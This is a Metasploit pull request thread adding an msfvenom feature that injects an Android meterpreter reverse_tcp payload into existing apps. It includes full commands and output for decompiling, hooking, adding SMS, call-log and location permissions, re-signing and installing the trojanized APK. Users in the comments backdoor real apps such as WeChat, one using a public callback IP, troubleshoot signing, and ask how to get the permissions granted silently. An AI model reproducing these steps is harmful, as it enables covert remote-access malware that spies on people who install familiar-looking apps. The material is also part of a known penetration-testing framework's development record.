### PR TITLE
Add msfvenom -x for Android payloads (fix #6229)

### LINKED ISSUE #6229: Support apk format for msfvenom -x (custom template)
Can anyone give me the command to create android payload with custom template ? All my commands only create apk file with 8000 bytes . Sorry for bad english .

### PR DESCRIPTION
**Pull request by timwr**
This change integrates the apk_backdoor script from #5932 (thanks @Jack64!) into msfvenom (using the existing -x argument), e.g

```
$ msfvenom -x ../backtest/CameraSample.apk -p android/meterpreter/reverse_tcp LHOST=HANDLERIP LPORT=4444 -o met2.apk
Using APK template: ../backtest/CameraSample.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading /tmp/d20151222-6955-ai9rhh/original/smali/com/phonegap/camerasample/CameraSampleActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.ACCESS_WIFI_STATE
[*] Adding android.permission.CHANGE_WIFI_STATE
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.WRITE_SETTINGS
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.RECEIVE_BOOT_COMPLETED
[*] Rebuilding ../backtest/CameraSample.apk with meterpreter injection as /tmp/d20151222-6955-ai9rhh/output.apk
[*] Signing /tmp/d20151222-6955-ai9rhh/output.apk
Payload size: 154154 bytes
Saved as: met2.apk
```

To test:
- [x] Get a random APK from the internet (or pull it from your device: `adb shell pm path com.apkpackagename; adb pull ...`)
- [x] Add an android payload to it with `msfvenom -x downloaded.apk -p android/meterpreter/reverse_tcp LHOST=HANDLERIP LPORT=4444 -o met2.apk`
- [x] Install it on a device (it will be signed already, but make sure the original isn't installed as the signature won't match)
- [x] Click the app icon, ensure you get a working meterpreter session

### CODE REVIEW

**Comment by Jack64** [comment]
Holy crap dude, that's awesome! We should give it more "smarts" when it comes to selecting where to insert the hook, as @hdm pointed out before on IRC, the whole "Hook Point Selection" portion may get a bit confusing for first-timers.

**Comment by Jack64** [comment]
@timwr You could test with facebook's apk and facebook messenger apk and see if it works without the hook point selection. Last time I checked the "MainActivity" for those as specified on their manifest is an <code>activity-alias</code> so the script doesn't parse it correctly.

File: lib/msf/core/payload/apk.rb [hunk 1]
```diff
@@ -0,0 +1,193 @@
...
+        new_mani << line+"\n"
+      end
+    end
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
+  end
+
+  def backdoor_payload(apkfile, raw_payload)
+    unless apkfile && File.readable?(apkfile)
+      usage
+      exit(1)
```
Comment (bcook-r7) [inline lib/msf/core/payload/apk.rb]: noted by @wchen-r7 , we shouldn't be exiting from library code. Instead, raise an exception.

File: lib/msf/core/payload/apk.rb [hunk 2]
```diff
@@ -0,0 +1,193 @@
...
+        inject=1
+      else
+        new_mani << line+"\n"
+      end
+    end
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
+  end
+
+  def backdoor_payload(apkfile, raw_payload)
+    unless apkfile && File.readable?(apkfile)
```
Comment (bcook-r7) [inline lib/msf/core/payload/apk.rb]: This should probably not be in a giant catch-all rescue block, but instead raise an exception for each thing that needs a check.

File: lib/msf/core/payload/apk.rb [hunk 3]
```diff
@@ -0,0 +1,193 @@
...
+    fix_manifest(tempdir)
+
+    print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
+    run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
+    print_status "Signing #{injected_apk}\n"
+    run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
+
+    outputapk = File.read(injected_apk)
+  rescue
+    FileUtils.remove_entry tempdir
```
Comment (bcook-r7) [inline lib/msf/core/payload/apk.rb]: this creates a double exception if we fail to create tempdir above

**Comment by Megaeloelo** [comment]
I have error : "no implicit conversion of nil into string"

**Comment by timwr** [comment]
@Megaeloelo can you help me reproduce? What command did you run? Which apk?
Thanks @bcook-r7 , processing...

**Comment by Megaeloelo** [comment]
"msfvenom -x /mnt/sdcard1/pou.apk -p android/meterpreter/reverse_tcp LHOST = 192.168.1.2 LPORT=4444 -o pou2.apk" What else do I need to have installed in addition to the apktool? Sorry for bad english .

**Comment by Megaeloelo** [comment]
PS : I using kali linux on android smartphone .

**Comment by Dhamuharker** [comment]
hii Megaeloelo , this payload are courrently working . which version only supported ? ! " msfvenom -x /mnt/sdcard1/pou.apk -p android/meterpreter/reverse_tcp LHOST = 192.168.1.2 LPORT=4444 -o pou2.apk"

**Comment by Megaeloelo** [comment]
@up I do not know English well and I can not understand you .

File: lib/msf/core/payload/apk.rb (hunk 2 above)
Comment (timwr) [inline lib/msf/core/payload/apk.rb]: This is fixed now btw

Comment (bcook-r7) [inline lib/msf/core/payload/apk.rb]: Thanks. Strange that github call it an outdated comment :)

**Comment by bcook-r7** [comment]
This worked for me, merged. Thanks @timwr 

@Megaeloelo do you mean you are running Kali linux itself on an Android phone?

**Comment by Megaeloelo** [comment]
Yes but I fixed that issue .

**Comment by jlee-r7** [comment]
For posterity, this functionality requires apktool in your path: https://ibotpeaches.github.io/Apktool/

**Comment by Adastra-thw** [comment]
Hello!
I'm having some issues running msfvenom with a custom template, I don't know if this is a bug, but it seems.
I run the following command:


> ./msfvenom -x /home/adastra/com.tencent.mm-2.apk -p android/meterpreter/reverse_tcp LHOST=87.106.15.174 LPORT=4444 -o /home/adastra/target.apk


This is the log:

> Using APK template: /home/adastra/Escritorio/com.tencent.mm-2.apk
> No platform was selected, choosing Msf::Module::Platform::Android from the payload
> No Arch selected, selecting Arch: dalvik from the payload
> [*] Decompiling original APK..
> [*] Decompiling payload APK..
> [*] Locating hook point..
> [*] Copying payload files..
> [*] Loading /tmp/d20160319-17436-keel47/original/smali/com/tencent/mm/ui/LauncherUI.smali and injecting payload..
> [*] Poisoning the manifest with meterpreter permissions..
> [*] Adding android.permission.ACCESS_COURSE_LOCATION
> [*] Adding android.permission.SEND_SMS
> [*] Adding android.permission.RECEIVE_SMS
> [*] Adding android.permission.CALL_PHONE
> [*] Adding android.permission.SET_WALLPAPER
> [*] Adding android.permission.READ_CALL_LOG
> [*] Adding android.permission.WRITE_CALL_LOG
> [*] Rebuilding /home/adastra/Escritorio/com.tencent.mm-2.apk with meterpreter injection as /tmp/d20160319-17436-keel47/output.apk
> [*] Signing /tmp/d20160319-17436-keel47/output.apk
> **Error: No such file or directory @ rb_sysopen - /tmp/d20160319-17436-keel47/output.apk**


I'm using the lastest MSF version in the repository and ruby 2.2.4.
In the /tmp/xxxxxxxx  directory, I can see the following files:

> ls -l /tmp/d20160319-17436-keel47/
> total 34976
> drwxrwxr-x 9 root root     4096 mar 19 00:49 original
> -rw-rw-r-- 1 root root 35794670 mar 19 00:49 original.apk
> drwxrwxr-x 5 root root     4096 mar 19 00:49 payload
> -rw-rw-r-- 1 root root     9036 mar 19 00:49 payload.apk

So, the program is working until it needs to ... I don't know, signing the output.apk??
Anyway, what's going on? Am I doing something wrong or there's an problem with msfvenom in the lastest repo. version?

Thanks for your responses.

**Comment by timwr** [comment]
Looks like an issue with apktool as output.apk is not built. If you rebuild the app manually with apktool does it still work? Can you send a link to the apk?

**Comment by Adastra-thw** [comment]
Thanks for your reply.
This is the apk that I'm using http://wechat.uptodown.com/android
With apktool doesn't work too, so seems that it's no a problem with msfvenom

**Comment by Adastra-thw** [comment]
Another issue that I have is using the malicious APK generates with msfvenom using an apk as template. I've tested a lot of apks of usual applications (whatsapp, facebook messenger, twitter, etc). However, when I try to install the apk in an device I get the error: "Error analizing the packet". I get this for every apk that I've tried. With the lastest version of msfvenom I've only get success generating an APK without a custom template. 
Somebody has the same problem?
Thanks! :-)

**Comment by Jack64** [comment]
This may be related either to apktool or jarsigner. Did you compile apktool from git? This usually fixes issues, also make sure jarsigner is installed on the machine.

**Comment by Adastra-thw** [comment]
Yep, I've installed apktool from git and jarsigner is installed on my machine. I don't know what's going on...

**Comment by Adastra-thw** [comment]
Hello again, 
I've done the process manually using apktool, jarsigner and the original apk following this tutorial: http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/ 
In my case, this works perfectly, but I can not get the same results using msfvenom. I don't know why, but now I'm pretty sure that apktool, jarsigner and android-payload works in my system.

**Comment by EchoUnderscoreNine** [comment]
I get the error: "Error analizing the packet"!??

BTW --> compiled apktool to v.2.2.1 ran a test + works fine BUT .. apparently "msfvenum -x .." aint getting any of those apk fuckers signed!  "tried it on 13 different apk from 3 different sites"

So, i guess it`s back to the drawing board for this  #6385 guy.

**Comment by Jack64** [comment]
Maybe you should check your environment is proper before calling people out.
Try looking at the tmp directory that msfvenom creates to work on the APKs and see if they're properly built, if so, try manually signing with :

`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA <apkfile> androiddebugkey`

I tested the -x *.apk function not 2 weeks ago and it was working as expected.

**Comment by EchoUnderscoreNine** [comment]
i did https://ibotpeaches.github.io/Apktool/ 

and there`s nothing wrong with my env !

**Comment by Jack64** [comment]
Well, with a descriptive error log like 

> "Error parsing some shit"!??

anything could be wrong.
Until you give more information about what errors pop up, I can't give you further help.

**Comment by EchoUnderscoreNine** [comment]
well .. to begin with ,i apologize if i offended anyone .. secondly i want to point out that there was
nothing wrong with the script & there is no need to jarsign manually .. here the solution .. since msf runs on root i figured out that the root folder was missing ~/.android/debug.keystore though it seems to default to the home/user end .. i had to generate it manually : 

keytool -genkey -v -keystore ~/.android/debug.keystore -alias androiddebugkey -storepass android -keypass android -keyalg RSA -keysize 2048 -validity 10000 -dname "CN=Android Debug,O=Android,C=US"

then the magic happened ! no need for jarsigner plus any ver of apktool would do .
B.Rgds. and thx for ignoring my temper ;)

**Comment by EchoUnderscoreNine** [comment]
in short "msfvenom -x ..." would gen & sign the infected apk perfectly.

**Comment by busterb** [comment]
Perhaps we just need a simple patch here to check if the user has the appropriate signing key configured, and if not, gently guide them along the proper path.

**Comment by timwr** [comment]
Thanks @EchoUnderscoreNine , it's an edge case but I've sent a pr that should ensure the script generates the debug keystore if it's not present. Many thanks for your help!

**Comment by EchoUnderscoreNine** [comment]
no prob, your welcome i hope this common unnoticeable mistake clears a lot of answers for whoever disregards the simple stuff including myself :)

**Comment by ghostinov** [comment]
hey, where are the permissions stored ? tried different apks that had file permissions missing and msfvenom does not add the file permissions. any help ? m

**Comment by Jack64** [comment]
@ghostinov APK permissions are defined in the AndroidManifest.xml file. The host app's permissions are being parsed and checked against the meterpreter permissions and the differences are added to the host APK's permission list, ensuring both host app and meterpreter payload have the permissions for all functionality to work properly.

**Comment by ghostinov** [comment]
@Jack64 Thanks, i reviewd the app permissions on the device, file permission were there but they were not enabled. i am running android 6.0 and was expecting the payload to work but needed to manually enable the permissions on the device. is there anything we can do to get the permissions enabled by default on app installation ? i realise that android 6.0 had added the runtime permissions check but is there any way to enable them?

**Comment by Jack64** [comment]
@ghostinov Yep, Android has since changed the permissions model from an "Accept All" at the beginning to an "on-demand" model. This PR did not account for that, I coded this for 5.0.1 and lower. Nice catch.

**Pull request merged**